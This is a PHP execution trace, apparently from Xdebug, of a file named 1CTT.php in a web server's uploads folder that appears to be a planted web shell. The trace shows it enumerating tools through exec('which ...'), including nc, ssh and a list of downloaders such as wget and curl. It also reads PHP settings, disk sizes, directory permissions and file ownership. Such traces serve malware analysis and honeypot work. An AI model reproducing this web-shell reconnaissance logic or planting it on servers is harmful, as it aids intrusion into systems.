3		A						/var/www/html/uploads/1CTT.php	260	$out = '/usr/bin/gzip'
3	1873	1	0.085454	725904
3	1873	R			'/usr/bin/gzip'
2		A						/var/www/html/uploads/1CTT.php	370	$path = '/usr/bin/gzip'
3	1877	0	0.085481	725864	strlen	0		/var/www/html/uploads/1CTT.php	372	1	'/usr/bin/gzip'
3	1877	1	0.085494	725896
3	1877	R			13
2	1872	1	0.085508	725824
2	1872	R			13
1		A						/var/www/html/uploads/1CTT.php	163	$x++
1		A						/var/www/html/uploads/1CTT.php	164	$useful .= 'gzip, '
2	1878	0	0.085542	725840	which	1		/var/www/html/uploads/1CTT.php	162	1	'bzip'
3	1879	0	0.085554	725880	exe	1		/var/www/html/uploads/1CTT.php	370	1	'which bzip'
3		A						/var/www/html/uploads/1CTT.php	256	$out = ''
4	1880	0	0.085577	725880	function_exists	0		/var/www/html/uploads/1CTT.php	258	1	'exec'
4	1880	1	0.085589	725920
4	1880	R			TRUE
4	1881	0	0.085602	725904	exec	0		/var/www/html/uploads/1CTT.php	259	2	'which bzip'	''
4	1881	1	0.086782	726024
4	1881	R			''
4	1882	0	0.086804	725960	join	0		/var/www/html/uploads/1CTT.php	260	2	'\n'	[]
4	1882	1	0.086819	726024
4	1882	R			''
3		A						/var/www/html/uploads/1CTT.php	260	$out = ''
3	1879	1	0.086844	725880
3	1879	R			''
2		A						/var/www/html/uploads/1CTT.php	370	$path = ''
2	1878	1	0.086868	725840
2	1878	R			FALSE
2	1883	0	0.086882	725840	which	1		/var/www/html/uploads/1CTT.php	162	1	'bzialfa2'
3	1884	0	0.086897	725880	exe	1		/var/www/html/uploads/1CTT.php	370	1	'which bzialfa2'
3		A						/var/www/html/uploads/1CTT.php	256	$out = ''
4	1885	0	0.086921	725880	function_exists	0		/var/www/html/uploads/1CTT.php	258	1	'exec'
4	1885	1	0.086935	725920
4	1885	R			TRUE
4	1886	0	0.086949	725904	exec	0		/var/www/html/uploads/1CTT.php	259	2	'which bzialfa2'	''
4	1886	1	0.088079	726024
4	1886	R			''
4	1887	0	0.088102	725960	join	0		/var/www/html/uploads/1CTT.php	260	2	'\n'	[]
4	1887	1	0.088123	726024
4	1887	R			''
3		A						/var/www/html/uploads/1CTT.php	260	$out = ''
3	1884	1	0.088149	725880
3	1884	R			''
2		A						/var/www/html/uploads/1CTT.php	370	$path = ''
2	1883	1	0.088173	725840
2	1883	R			FALSE
2	1888	0	0.088187	725840	which	1		/var/www/html/uploads/1CTT.php	162	1	'nc'
3	1889	0	0.088201	725880	exe	1		/var/www/html/uploads/1CTT.php	370	1	'which nc'
3		A						/var/www/html/uploads/1CTT.php	256	$out = ''
4	1890	0	0.088224	725880	function_exists	0		/var/www/html/uploads/1CTT.php	258	1	'exec'
4	1890	1	0.088237	725920
4	1890	R			TRUE
4	1891	0	0.088251	725904	exec	0		/var/www/html/uploads/1CTT.php	259	2	'which nc'	''
4	1891	1	0.089427	726424
4	1891	R			'/usr/bin/nc'
4	1892	0	0.089449	726320	join	0		/var/www/html/uploads/1CTT.php	260	2	'\n'	[0 => '/usr/bin/nc']
4	1892	1	0.089465	726384
4	1892	R			'/usr/bin/nc'
3		A						/var/www/html/uploads/1CTT.php	260	$out = '/usr/bin/nc'
3	1889	1	0.089491	725920
3	1889	R			'/usr/bin/nc'
2		A						/var/www/html/uploads/1CTT.php	370	$path = '/usr/bin/nc'
3	1893	0	0.089516	725880	strlen	0		/var/www/html/uploads/1CTT.php	372	1	'/usr/bin/nc'
3	1893	1	0.089529	725912
3	1893	R			11
2	1888	1	0.089542	725840
2	1888	R			11
1		A						/var/www/html/uploads/1CTT.php	163	$x++
1		A						/var/www/html/uploads/1CTT.php	164	$useful .= 'nc, '
2	1894	0	0.089575	725840	which	1		/var/www/html/uploads/1CTT.php	162	1	'locate'
3	1895	0	0.089588	725880	exe	1		/var/www/html/uploads/1CTT.php	370	1	'which locate'
3		A						/var/www/html/uploads/1CTT.php	256	$out = ''
4	1896	0	0.089611	725880	function_exists	0		/var/www/html/uploads/1CTT.php	258	1	'exec'
4	1896	1	0.089623	725920
4	1896	R			TRUE
4	1897	0	0.089637	725904	exec	0		/var/www/html/uploads/1CTT.php	259	2	'which locate'	''
4	1897	1	0.090859	726024
4	1897	R			''
4	1898	0	0.090882	725960	join	0		/var/www/html/uploads/1CTT.php	260	2	'\n'	[]
4	1898	1	0.090897	726024
4	1898	R			''
3		A						/var/www/html/uploads/1CTT.php	260	$out = ''
3	1895	1	0.090922	725880
3	1895	R			''
2		A						/var/www/html/uploads/1CTT.php	370	$path = ''
2	1894	1	0.090946	725840
2	1894	R			FALSE
2	1899	0	0.090960	725840	which	1		/var/www/html/uploads/1CTT.php	162	1	'suidperl'
3	1900	0	0.090975	725880	exe	1		/var/www/html/uploads/1CTT.php	370	1	'which suidperl'
3		A						/var/www/html/uploads/1CTT.php	256	$out = ''
4	1901	0	0.090999	725880	function_exists	0		/var/www/html/uploads/1CTT.php	258	1	'exec'
4	1901	1	0.091013	725920
4	1901	R			TRUE
4	1902	0	0.091027	725904	exec	0		/var/www/html/uploads/1CTT.php	259	2	'which suidperl'	''
4	1902	1	0.092236	726024
4	1902	R			''
4	1903	0	0.092260	725960	join	0		/var/www/html/uploads/1CTT.php	260	2	'\n'	[]
4	1903	1	0.092275	726024
4	1903	R			''
3		A						/var/www/html/uploads/1CTT.php	260	$out = ''
3	1900	1	0.092301	725880
3	1900	R			''
2		A						/var/www/html/uploads/1CTT.php	370	$path = ''
2	1899	1	0.092325	725840
2	1899	R			FALSE
2	1904	0	0.092339	725840	which	1		/var/www/html/uploads/1CTT.php	162	1	'git'
3	1905	0	0.092351	725880	exe	1		/var/www/html/uploads/1CTT.php	370	1	'which git'
3		A						/var/www/html/uploads/1CTT.php	256	$out = ''
4	1906	0	0.092375	725880	function_exists	0		/var/www/html/uploads/1CTT.php	258	1	'exec'
4	1906	1	0.092389	725920
4	1906	R			TRUE
4	1907	0	0.092402	725904	exec	0		/var/www/html/uploads/1CTT.php	259	2	'which git'	''
4	1907	1	0.093579	726424
4	1907	R			'/usr/bin/git'
4	1908	0	0.093604	726320	join	0		/var/www/html/uploads/1CTT.php	260	2	'\n'	[0 => '/usr/bin/git']
4	1908	1	0.093621	726384
4	1908	R			'/usr/bin/git'
3		A						/var/www/html/uploads/1CTT.php	260	$out = '/usr/bin/git'
3	1905	1	0.093649	725920
3	1905	R			'/usr/bin/git'
2		A						/var/www/html/uploads/1CTT.php	370	$path = '/usr/bin/git'
3	1909	0	0.093680	725880	strlen	0		/var/www/html/uploads/1CTT.php	372	1	'/usr/bin/git'
3	1909	1	0.093694	725912
3	1909	R			12
2	1904	1	0.093707	725840
2	1904	R			12
1		A						/var/www/html/uploads/1CTT.php	163	$x++
1		A						/var/www/html/uploads/1CTT.php	164	$useful .= 'git, '
2	1910	0	0.093741	725840	which	1		/var/www/html/uploads/1CTT.php	162	1	'docker'
3	1911	0	0.093754	725880	exe	1		/var/www/html/uploads/1CTT.php	370	1	'which docker'
3		A						/var/www/html/uploads/1CTT.php	256	$out = ''
4	1912	0	0.093778	725880	function_exists	0		/var/www/html/uploads/1CTT.php	258	1	'exec'
4	1912	1	0.093791	725920
4	1912	R			TRUE
4	1913	0	0.093804	725904	exec	0		/var/www/html/uploads/1CTT.php	259	2	'which docker'	''
4	1913	1	0.094985	726024
4	1913	R			''
4	1914	0	0.095008	725960	join	0		/var/www/html/uploads/1CTT.php	260	2	'\n'	[]
4	1914	1	0.095023	726024
4	1914	R			''
3		A						/var/www/html/uploads/1CTT.php	260	$out = ''
3	1911	1	0.095049	725880
3	1911	R			''
2		A						/var/www/html/uploads/1CTT.php	370	$path = ''
2	1910	1	0.095074	725840
2	1910	R			FALSE
2	1915	0	0.095088	725840	which	1		/var/www/html/uploads/1CTT.php	162	1	'ssh'
3	1916	0	0.095102	725880	exe	1		/var/www/html/uploads/1CTT.php	370	1	'which ssh'
3		A						/var/www/html/uploads/1CTT.php	256	$out = ''
4	1917	0	0.095126	725880	function_exists	0		/var/www/html/uploads/1CTT.php	258	1	'exec'
4	1917	1	0.095140	725920
4	1917	R			TRUE
4	1918	0	0.095154	725904	exec	0		/var/www/html/uploads/1CTT.php	259	2	'which ssh'	''
4	1918	1	0.097065	726424
4	1918	R			'/usr/bin/ssh'
4	1919	0	0.097090	726320	join	0		/var/www/html/uploads/1CTT.php	260	2	'\n'	[0 => '/usr/bin/ssh']
4	1919	1	0.097107	726384
4	1919	R			'/usr/bin/ssh'
3		A						/var/www/html/uploads/1CTT.php	260	$out = '/usr/bin/ssh'
3	1916	1	0.097135	725920
3	1916	R			'/usr/bin/ssh'
2		A						/var/www/html/uploads/1CTT.php	370	$path = '/usr/bin/ssh'
3	1920	0	0.097161	725880	strlen	0		/var/www/html/uploads/1CTT.php	372	1	'/usr/bin/ssh'
3	1920	1	0.097174	725912
3	1920	R			12
2	1915	1	0.097187	725840
2	1915	R			12
1		A						/var/www/html/uploads/1CTT.php	163	$x++
1		A						/var/www/html/uploads/1CTT.php	164	$useful .= 'ssh, '
1		A						/var/www/html/uploads/1CTT.php	170	$downloaders = [0 => 'wget', 1 => 'fetch', 2 => 'lynx', 3 => 'links', 4 => 'curl', 5 => 'get', 6 => 'lwp-mirror']
1		A						/var/www/html/uploads/1CTT.php	171	$x = 0
2	1921	0	0.097249	725840	which	1		/var/www/html/uploads/1CTT.php	173	1	'wget'
3	1922	0	0.097262	725880	exe	1		/var/www/html/uploads/1CTT.php	370	1	'which wget'
3		A						/var/www/html/uploads/1CTT.php	256	$out = ''
4	1923	0	0.097285	725880	function_exists	0		/var/www/html/uploads/1CTT.php	258	1	'exec'
4	1923	1	0.097298	725920
4	1923	R			TRUE
4	1924	0	0.097311	725904	exec	0		/var/www/html/uploads/1CTT.php	259	2	'which wget'	''
4	1924	1	0.098508	726424
4	1924	R			'/usr/bin/wget'
4	1925	0	0.098533	726320	join	0		/var/www/html/uploads/1CTT.php	260	2	'\n'	[0 => '/usr/bin/wget']
4	1925	1	0.098549	726384
4	1925	R			'/usr/bin/wget'
3		A						/var/www/html/uploads/1CTT.php	260	$out = '/usr/bin/wget'
3	1922	1	0.098577	725920
3	1922	R			'/usr/bin/wget'
2		A						/var/www/html/uploads/1CTT.php	370	$path = '/usr/bin/wget'
3	1926	0	0.098603	725880	strlen	0		/var/www/html/uploads/1CTT.php	372	1	'/usr/bin/wget'
3	1926	1	0.098626	725912
3	1926	R			13
2	1921	1	0.098643	725840
2	1921	R			13
1		A						/var/www/html/uploads/1CTT.php	174	$x++
1		A						/var/www/html/uploads/1CTT.php	175	$downloader .= 'wget, '
2	1927	0	0.098681	725872	which	1		/var/www/html/uploads/1CTT.php	173	1	'fetch'
3	1928	0	0.098695	725912	exe	1		/var/www/html/uploads/1CTT.php	370	1	'which fetch'
3		A						/var/www/html/uploads/1CTT.php	256	$out = ''
4	1929	0	0.098718	725912	function_exists	0		/var/www/html/uploads/1CTT.php	258	1	'exec'
4	1929	1	0.098738	725952
4	1929	R			TRUE
4	1930	0	0.098752	725936	exec	0		/var/www/html/uploads/1CTT.php	259	2	'which fetch'	''
4	1930	1	0.099928	726056
4	1930	R			''
4	1931	0	0.099951	725992	join	0		/var/www/html/uploads/1CTT.php	260	2	'\n'	[]
4	1931	1	0.099966	726056
4	1931	R			''
3		A						/var/www/html/uploads/1CTT.php	260	$out = ''
3	1928	1	0.099992	725912
3	1928	R			''
2		A						/var/www/html/uploads/1CTT.php	370	$path = ''
2	1927	1	0.100016	725872
2	1927	R			FALSE
2	1932	0	0.100029	725872	which	1		/var/www/html/uploads/1CTT.php	173	1	'lynx'
3	1933	0	0.100044	725912	exe	1		/var/www/html/uploads/1CTT.php	370	1	'which lynx'
3		A						/var/www/html/uploads/1CTT.php	256	$out = ''
4	1934	0	0.100067	725912	function_exists	0		/var/www/html/uploads/1CTT.php	258	1	'exec'
4	1934	1	0.100080	725952
4	1934	R			TRUE
4	1935	0	0.100094	725936	exec	0		/var/www/html/uploads/1CTT.php	259	2	'which lynx'	''
4	1935	1	0.101276	726056
4	1935	R			''
4	1936	0	0.101299	725992	join	0		/var/www/html/uploads/1CTT.php	260	2	'\n'	[]
4	1936	1	0.101313	726056
4	1936	R			''
3		A						/var/www/html/uploads/1CTT.php	260	$out = ''
3	1933	1	0.101339	725912
3	1933	R			''
2		A						/var/www/html/uploads/1CTT.php	370	$path = ''
2	1932	1	0.101363	725872
2	1932	R			FALSE
2	1937	0	0.101376	725872	which	1		/var/www/html/uploads/1CTT.php	173	1	'links'
3	1938	0	0.101390	725912	exe	1		/var/www/html/uploads/1CTT.php	370	1	'which links'
3		A						/var/www/html/uploads/1CTT.php	256	$out = ''
4	1939	0	0.101414	725912	function_exists	0		/var/www/html/uploads/1CTT.php	258	1	'exec'
4	1939	1	0.101428	725952
4	1939	R			TRUE
4	1940	0	0.101441	725936	exec	0		/var/www/html/uploads/1CTT.php	259	2	'which links'	''
4	1940	1	0.102639	726056
4	1940	R			''
4	1941	0	0.102663	725992	join	0		/var/www/html/uploads/1CTT.php	260	2	'\n'	[]
4	1941	1	0.102677	726056
4	1941	R			''
3		A						/var/www/html/uploads/1CTT.php	260	$out = ''
3	1938	1	0.102703	725912
3	1938	R			''
2		A						/var/www/html/uploads/1CTT.php	370	$path = ''
2	1937	1	0.102727	725872
2	1937	R			FALSE
2	1942	0	0.102742	725872	which	1		/var/www/html/uploads/1CTT.php	173	1	'curl'
3	1943	0	0.102755	725912	exe	1		/var/www/html/uploads/1CTT.php	370	1	'which curl'
3		A						/var/www/html/uploads/1CTT.php	256	$out = ''
4	1944	0	0.102780	725912	function_exists	0		/var/www/html/uploads/1CTT.php	258	1	'exec'
4	1944	1	0.102793	725952
4	1944	R			TRUE
4	1945	0	0.102807	725936	exec	0		/var/www/html/uploads/1CTT.php	259	2	'which curl'	''
4	1945	1	0.104052	726456
4	1945	R			'/usr/bin/curl'
4	1946	0	0.104084	726352	join	0		/var/www/html/uploads/1CTT.php	260	2	'\n'	[0 => '/usr/bin/curl']
4	1946	1	0.104109	726416
4	1946	R			'/usr/bin/curl'
3		A						/var/www/html/uploads/1CTT.php	260	$out = '/usr/bin/curl'
3	1943	1	0.104150	725952
3	1943	R			'/usr/bin/curl'
2		A						/var/www/html/uploads/1CTT.php	370	$path = '/usr/bin/curl'
3	1947	0	0.104190	725912	strlen	0		/var/www/html/uploads/1CTT.php	372	1	'/usr/bin/curl'
3	1947	1	0.104206	725944
3	1947	R			13
2	1942	1	0.104220	725872
2	1942	R			13
1		A						/var/www/html/uploads/1CTT.php	174	$x++
1		A						/var/www/html/uploads/1CTT.php	175	$downloader .= 'curl, '
2	1948	0	0.104254	725880	which	1		/var/www/html/uploads/1CTT.php	173	1	'get'
3	1949	0	0.104267	725920	exe	1		/var/www/html/uploads/1CTT.php	370	1	'which get'
3		A						/var/www/html/uploads/1CTT.php	256	$out = ''
4	1950	0	0.104290	725920	function_exists	0		/var/www/html/uploads/1CTT.php	258	1	'exec'
4	1950	1	0.104304	725960
4	1950	R			TRUE
4	1951	0	0.104318	725944	exec	0		/var/www/html/uploads/1CTT.php	259	2	'which get'	''
4	1951	1	0.105452	726064
4	1951	R			''
4	1952	0	0.105473	726000	join	0		/var/www/html/uploads/1CTT.php	260	2	'\n'	[]
4	1952	1	0.105491	726064
4	1952	R			''
3		A						/var/www/html/uploads/1CTT.php	260	$out = ''
3	1949	1	0.105516	725920
3	1949	R			''
2		A						/var/www/html/uploads/1CTT.php	370	$path = ''
2	1948	1	0.105540	725880
2	1948	R			FALSE
2	1953	0	0.105554	725880	which	1		/var/www/html/uploads/1CTT.php	173	1	'lwp-mirror'
3	1954	0	0.105568	725928	exe	1		/var/www/html/uploads/1CTT.php	370	1	'which lwp-mirror'
3		A						/var/www/html/uploads/1CTT.php	256	$out = ''
4	1955	0	0.105591	725928	function_exists	0		/var/www/html/uploads/1CTT.php	258	1	'exec'
4	1955	1	0.105605	725968
4	1955	R			TRUE
4	1956	0	0.105618	725952	exec	0		/var/www/html/uploads/1CTT.php	259	2	'which lwp-mirror'	''
4	1956	1	0.106842	726488
4	1956	R			'/usr/bin/lwp-mirror'
4	1957	0	0.106867	726376	join	0		/var/www/html/uploads/1CTT.php	260	2	'\n'	[0 => '/usr/bin/lwp-mirror']
4	1957	1	0.106885	726440
4	1957	R			'/usr/bin/lwp-mirror'
3		A						/var/www/html/uploads/1CTT.php	260	$out = '/usr/bin/lwp-mirror'
3	1954	1	0.106912	725976
3	1954	R			'/usr/bin/lwp-mirror'
2		A						/var/www/html/uploads/1CTT.php	370	$path = '/usr/bin/lwp-mirror'
3	1958	0	0.106939	725928	strlen	0		/var/www/html/uploads/1CTT.php	372	1	'/usr/bin/lwp-mirror'
3	1958	1	0.106952	725960
3	1958	R			19
2	1953	1	0.106966	725880
2	1953	R			19
1		A						/var/www/html/uploads/1CTT.php	174	$x++
1		A						/var/www/html/uploads/1CTT.php	175	$downloader .= 'lwp-mirror, '
2	1959	0	0.107002	725896	scandir	0		/var/www/html/uploads/1CTT.php	773	1	'/var/www/html/uploads'
2	1959	1	0.107036	726520
2	1959	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => '1CTT.php', 4 => 'data', 5 => 'prepend.php']
1		A						/var/www/html/uploads/1CTT.php	773	$scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '1CTT.php', 4 => 'data', 5 => 'prepend.php']
2	1960	0	0.107077	726488	clear	1		/var/www/html/uploads/1CTT.php	802	0
2	1960	1	0.107090	726488
2	1961	0	0.107190	726600	phpversion	0		/var/www/html/uploads/1CTT.php	972	0
2	1961	1	0.107204	726664
2	1961	R			'7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
2	1962	0	0.107223	726600	formatSize	1		/var/www/html/uploads/1CTT.php	980	1	232015802368
2		A						/var/www/html/uploads/1CTT.php	211	$types = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
2		A						/var/www/html/uploads/1CTT.php	212	$i = 0
3	1963	0	0.107262	726600	count	0		/var/www/html/uploads/1CTT.php	212	1	[0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
3	1963	1	0.107278	726632
3	1963	R			5
2		A						/var/www/html/uploads/1CTT.php	212	$bytes /= 1024
2		A						/var/www/html/uploads/1CTT.php	212	$i++
3	1964	0	0.107311	726600	count	0		/var/www/html/uploads/1CTT.php	212	1	[0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
3	1964	1	0.107326	726632
3	1964	R			5
2		A						/var/www/html/uploads/1CTT.php	212	$bytes /= 1024
2		A						/var/www/html/uploads/1CTT.php	212	$i++
3	1965	0	0.107356	726600	count	0		/var/www/html/uploads/1CTT.php	212	1	[0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
3	1965	1	0.107371	726632
3	1965	R			5
2		A						/var/www/html/uploads/1CTT.php	212	$bytes /= 1024
2		A						/var/www/html/uploads/1CTT.php	212	$i++
3	1966	0	0.107402	726600	round	0		/var/www/html/uploads/1CTT.php	213	2	216.08155441284	2
3	1966	1	0.107416	726672
3	1966	R			216.08
2	1962	1	0.107431	726640
2	1962	R			'216.08 GB'
2	1967	0	0.107445	726600	formatSize	1		/var/www/html/uploads/1CTT.php	980	1	201430454272
2		A						/var/www/html/uploads/1CTT.php	211	$types = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
2		A						/var/www/html/uploads/1CTT.php	212	$i = 0
3	1968	0	0.107482	726600	count	0		/var/www/html/uploads/1CTT.php	212	1	[0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
3	1968	1	0.107497	726632
3	1968	R			5
2		A						/var/www/html/uploads/1CTT.php	212	$bytes /= 1024
2		A						/var/www/html/uploads/1CTT.php	212	$i++
3	1969	0	0.107527	726600	count	0		/var/www/html/uploads/1CTT.php	212	1	[0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
3	1969	1	0.107542	726632
3	1969	R			5
2		A						/var/www/html/uploads/1CTT.php	212	$bytes /= 1024
2		A						/var/www/html/uploads/1CTT.php	212	$i++
3	1970	0	0.107577	726600	count	0		/var/www/html/uploads/1CTT.php	212	1	[0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
3	1970	1	0.107592	726632
3	1970	R			5
2		A						/var/www/html/uploads/1CTT.php	212	$bytes /= 1024
2		A						/var/www/html/uploads/1CTT.php	212	$i++
3	1971	0	0.107621	726600	round	0		/var/www/html/uploads/1CTT.php	213	2	187.59672927856	2
3	1971	1	0.107634	726672
3	1971	R			187.6
2	1967	1	0.107648	726640
2	1967	R			'187.6 GB'
2	1972	0	0.107664	726600	rtrim	0		/var/www/html/uploads/1CTT.php	996	2	'gcc, cc, ld, make, php, perl, tar, gzip, nc, git, ssh, '	', '
2	1972	1	0.107680	726752
2	1972	R			'gcc, cc, ld, make, php, perl, tar, gzip, nc, git, ssh'
2	1973	0	0.107697	726600	rtrim	0		/var/www/html/uploads/1CTT.php	1000	2	'wget, curl, lwp-mirror, '	', '
2	1973	1	0.107711	726720
2	1973	R			'wget, curl, lwp-mirror'
2	1974	0	0.107726	726600	function_exists	0		/var/www/html/uploads/1CTT.php	1003	1	'curl_version'
2	1974	1	0.107740	726640
2	1974	R			TRUE
2	1975	0	0.107753	726600	function_exists	0		/var/www/html/uploads/1CTT.php	1003	1	'ssh2_connect'
2	1975	1	0.107766	726640
2	1975	R			FALSE
2	1976	0	0.107783	726600	function_exists	0		/var/www/html/uploads/1CTT.php	1003	1	'get_magic_quotes_gpc'
2	1976	1	0.107797	726640
2	1976	R			TRUE
2	1977	0	0.107812	726600	function_exists	0		/var/www/html/uploads/1CTT.php	1003	1	'mysql_get_client_info'
2	1977	1	0.107825	726640
2	1977	R			FALSE
2	1978	0	0.107863	726600	class_exists	0		/var/www/html/uploads/1CTT.php	1003	1	'mysqli'
2	1978	1	0.107877	726640
2	1978	R			FALSE
2	1979	0	0.107903	726600	function_exists	0		/var/www/html/uploads/1CTT.php	1003	1	'mssql_connect'
2	1979	1	0.107917	726640
2	1979	R			FALSE
2	1980	0	0.107930	726600	function_exists	0		/var/www/html/uploads/1CTT.php	1003	1	'pg_connect'
2	1980	1	0.107943	726640
2	1980	R			FALSE
2	1981	0	0.107956	726600	function_exists	0		/var/www/html/uploads/1CTT.php	1003	1	'oci_connect'
2	1981	1	0.107970	726640
2	1981	R			FALSE
2	1982	0	0.107983	726600	ini_get	0		/var/www/html/uploads/1CTT.php	1006	1	'safe_mode'
2	1982	1	0.107996	726632
2	1982	R			FALSE
2	1983	0	0.108009	726600	ini_get	0		/var/www/html/uploads/1CTT.php	1006	1	'safe_mode_exec_dir'
2	1983	1	0.108022	726632
2	1983	R			FALSE
2	1984	0	0.108035	726600	ini_get	0		/var/www/html/uploads/1CTT.php	1006	1	'safe_mode_include_dir'
2	1984	1	0.108048	726632
2	1984	R			FALSE
2	1985	0	0.108062	726600	count	0		/var/www/html/uploads/1CTT.php	1020	1	[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2	1985	1	0.108078	726632
2	1985	R			5
1		A						/var/www/html/uploads/1CTT.php	1020	$numDir = 5
1		A						/var/www/html/uploads/1CTT.php	1021	$id = 0
1		A						/var/www/html/uploads/1CTT.php	1021	$id = 1
1		A						/var/www/html/uploads/1CTT.php	1031	$i = 0
1		A						/var/www/html/uploads/1CTT.php	1031	$i++
1		A						/var/www/html/uploads/1CTT.php	1031	$i++
1		A						/var/www/html/uploads/1CTT.php	1021	$id = 2
1		A						/var/www/html/uploads/1CTT.php	1031	$i = 0
1		A						/var/www/html/uploads/1CTT.php	1031	$i++
1		A						/var/www/html/uploads/1CTT.php	1031	$i++
1		A						/var/www/html/uploads/1CTT.php	1031	$i++
1		A						/var/www/html/uploads/1CTT.php	1021	$id = 3
1		A						/var/www/html/uploads/1CTT.php	1031	$i = 0
1		A						/var/www/html/uploads/1CTT.php	1031	$i++
1		A						/var/www/html/uploads/1CTT.php	1031	$i++
1		A						/var/www/html/uploads/1CTT.php	1031	$i++
1		A						/var/www/html/uploads/1CTT.php	1031	$i++
1		A						/var/www/html/uploads/1CTT.php	1021	$id = 4
2	1986	0	0.108247	726600	perms	1		/var/www/html/uploads/1CTT.php	1041	1	'/var/www/html/uploads'
3	1987	0	0.108260	726600	fileperms	0		/var/www/html/uploads/1CTT.php	218	1	'/var/www/html/uploads'
3	1987	1	0.108276	726664
3	1987	R			16895
2		A						/var/www/html/uploads/1CTT.php	218	$perms = 16895
2		A						/var/www/html/uploads/1CTT.php	228	$info = 'd'
2		A						/var/www/html/uploads/1CTT.php	236	$info .= 'r'
2		A						/var/www/html/uploads/1CTT.php	237	$info .= 'w'
2		A						/var/www/html/uploads/1CTT.php	240	$info .= 'x'
2		A						/var/www/html/uploads/1CTT.php	241	$info .= 'r'
2		A						/var/www/html/uploads/1CTT.php	242	$info .= 'w'
2		A						/var/www/html/uploads/1CTT.php	245	$info .= 'x'
2		A						/var/www/html/uploads/1CTT.php	246	$info .= 'r'
2		A						/var/www/html/uploads/1CTT.php	247	$info .= 'w'
2		A						/var/www/html/uploads/1CTT.php	250	$info .= 'x'
3	1988	0	0.108400	726664	sprintf	0		/var/www/html/uploads/1CTT.php	251	2	'%o'	16895
3	1988	1	0.108414	727048
3	1988	R			'40777'
3	1989	0	0.108428	726984	substr	0		/var/www/html/uploads/1CTT.php	251	2	'40777'	-4
3	1989	1	0.108441	727080
3	1989	R			'0777'
2	1986	1	0.108454	726672
2	1986	R			'0777 >> drwxrwxrwx'
2	1990	0	0.108468	726672	checkPerm	1		/var/www/html/uploads/1CTT.php	1041	2	'/var/www/html/uploads'	'0777 >> drwxrwxrwx'
3	1991	0	0.108483	726672	explode	0		/var/www/html/uploads/1CTT.php	309	2	'>>'	'0777 >> drwxrwxrwx'
3	1991	1	0.108496	727192
3	1991	R			[0 => '0777 ', 1 => ' drwxrwxrwx']
2		A						/var/www/html/uploads/1CTT.php	309	$perm = [0 => '0777 ', 1 => ' drwxrwxrwx']
3	1992	0	0.108524	727120	is_writable	0		/var/www/html/uploads/1CTT.php	310	1	'/var/www/html/uploads'
3	1992	1	0.108540	727160
3	1992	R			TRUE
3	1993	0	0.108554	727120	trim	0		/var/www/html/uploads/1CTT.php	311	1	'0777 '
3	1993	1	0.108566	727184
3	1993	R			'0777'
3	1994	0	0.108580	727440	trim	0		/var/www/html/uploads/1CTT.php	311	1	'0777 '
3	1994	1	0.108592	727504
3	1994	R			'0777'
2	1990	1	0.108605	727056
2	1990	R			'<font class=\'text-success\' data-bs-toggle=\'modal\' data-bs-target=\'#chmodModal\' data-bs-perm=\'0777\' data-bs-name=\'/var/www/html/uploads\'>0777 </font> >> <font class=\'text-success\' data-bs-toggle=\'modal\' data-bs-target=\'#chmodModal\' data-bs-perm=\'0777\' data-bs-name=\'/var/www/html/uploads\'> drwxrwxrwx</font>'
2	1995	0	0.108630	726624	is_readable	0		/var/www/html/uploads/1CTT.php	1052	1	'/var/www/html/uploads'
2	1995	1	0.108645	726664
2	1995	R			TRUE
2	1996	0	0.108659	726672	is_dir	0		/var/www/html/uploads/1CTT.php	1069	1	'/var/www/html/uploads/.'
2	1996	1	0.108672	726712
2	1996	R			TRUE
2	1997	0	0.108688	726624	filetype	0		/var/www/html/uploads/1CTT.php	1081	1	'.'
2	1997	1	0.108702	726704
2	1997	R			'dir'
2	1998	0	0.108716	726632	filemtime	0		/var/www/html/uploads/1CTT.php	1083	1	'.'
2	1998	1	0.108730	726656
2	1998	R			1676250662
2	1999	0	0.108743	726616	date	0		/var/www/html/uploads/1CTT.php	1083	2	'Y-m-d h:i:s'	1676250662
2	1999	1	0.108783	727784
2	1999	R			'2023-02-13 08:11:02'
2	2000	0	0.108801	727456	getowner	1		/var/www/html/uploads/1CTT.php	1084	1	'.'
3	2001	0	0.108814	727456	function_exists	0		/var/www/html/uploads/1CTT.php	321	1	'posix_getpwuid'
3	2001	1	0.108828	727496
3	2001	R			TRUE
3	2002	0	0.108840	727456	fileowner	0		/var/www/html/uploads/1CTT.php	322	1	'.'
3	2002	1	0.108853	727496
3	2002	R			0
3	2003	0	0.108865	727456	posix_getpwuid	0		/var/www/html/uploads/1CTT.php	322	1	0
3	2003	1	0.108893	728256
3	2003	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/1CTT.php	322	$downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/1CTT.php	323	$downer = 'root'
3	2004	0	0.108946	727488	function_exists	0		/var/www/html/uploads/1CTT.php	327	1	'posix_getgrgid'
3	2004	1	0.108960	727528
3	2004	R			TRUE
3	2005	0	0.108973	727488	filegroup	0		/var/www/html/uploads/1CTT.php	328	1	'.'
3	2005	1	0.108985	727528
3	2005	R			0
3	2006	0	0.108997	727488	posix_getgrgid	0		/var/www/html/uploads/1CTT.php	328	1	0
3	2006	1	0.109020	728144
3	2006	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/1CTT.php	328	$dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/1CTT.php	329	$dgrp = 'root'
2	2000	1	0.109065	727496
2	2000	R			'root/root'
